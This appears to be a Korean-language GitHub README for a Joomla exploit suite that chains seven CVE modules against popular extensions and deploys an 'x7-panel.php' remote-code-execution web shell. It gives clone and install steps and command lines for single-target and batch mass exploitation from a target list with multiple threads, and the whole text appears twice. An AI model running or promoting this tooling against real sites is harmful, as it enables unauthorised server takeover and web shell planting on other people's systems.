Balbooa Forms, Page Builder CK, SP Page Builder, JCE, iCagenda, Helix3, SP LMS를 위한 7개의 익스플로잇 모듈과 x7-panel.php 페이로드 배포 기능을 갖춘 Joomla 다중 CVE RCE 제품군입니다.
Joomla Multi-CVE Suite — 7개 취약점 모듈 + x7-panel.php 배포
| CVE | 확장 기능 |
|---|---|
| CVE-2026-56291 | Balbooa Forms (com_baforms) |
| CVE-2026-56290 | Page Builder CK (com_pagebuilderck) |
| CVE-2026-48908 | SP Page Builder (com_sppagebuilder) |
| CVE-2026-48907 | JCE (com_jce) |
| CVE-2026-48939 | iCagenda (com_icagenda) |
| CVE-2026-49049 | Helix3 (plg_ajax_helix3) |
| CVE-2026-48909 | SP LMS (com_splms) — Joomla < 5.2.2 + --splms-path |
Suite는 기본적으로 자동 체인을 실행합니다. 단일 모듈에는 --cve를 사용하세요.
git clone https://github.com/winrarzipsexploit/CVE-2026-87930.git
cd CVE-2026-87930
pip install -r requirements.txt
| 파일 | 역할 |
|---|---|
winrarzips_brand.py | CMD 배너 (by winrarzips) |
joomla_exploits.py | 7-CVE 익스플로잇 모듈 |
CVE-2026-Joomla-Suite.py | 배치 + 단일 대상 CLI |
payloads/x7-panel.php | RCE 패널 |
requirements.txt | 종속성 |
❌ 대상 목록, 스캔 결과 및 패널 URL은 저장소에 포함되지 않습니다.
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes --cve CVE-2026-48908
python CVE-2026-Joomla-Suite.py -f targets.txt --yes --threads 8
Joomla < 5.2.2 대상의 경우 서버 경로가 필요합니다:
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes --cve CVE-2026-48909 --splms-path /var/www/html/tmp/x7-panel.php
Joomla Multi-CVE Suite — 7개 취약점 모듈 + x7-panel.php 배포
| CVE | 확장 기능 |
|---|---|
| CVE-2026-56291 | Balbooa Forms (com_baforms) |
| CVE-2026-56290 | Page Builder CK (com_pagebuilderck) |
| CVE-2026-48908 | SP Page Builder (com_sppagebuilder) |
| CVE-2026-48907 | JCE (com_jce) |
| CVE-2026-48939 | iCagenda (com_icagenda) |
| CVE-2026-49049 | Helix3 (plg_ajax_helix3) |
| CVE-2026-48909 | SP LMS (com_splms) — Joomla < 5.2.2 + --splms-path |
Suite는 기본적으로 자동 체인을 실행합니다. 단일 모듈에는 --cve를 사용하세요.
git clone https://github.com/winrarzipsexploit/CVE-2026-87930.git
cd CVE-2026-87930
pip install -r requirements.txt
| 파일 | 역할 |
|---|---|
winrarzips_brand.py | CMD 배너 (by winrarzips) |
joomla_exploits.py | 7-CVE 익스플로잇 모듈 |
CVE-2026-Joomla-Suite.py | 배치 + 단일 대상 CLI |
payloads/x7-panel.php | RCE 패널 페이로드 |
requirements.txt | 종속성 |
❌ 대상 목록, 스캔 결과 및 라이브 패널 URL은 포함되지 않습니다.
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes --cve CVE-2026-48908
python CVE-2026-Joomla-Suite.py -f targets.txt --yes --threads 8
Joomla < 5.2.2 대상의 경우 서버 경로를 제공하세요:
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes --cve CVE-2026-48909 --splms-path /var/www/html/tmp/x7-panel.php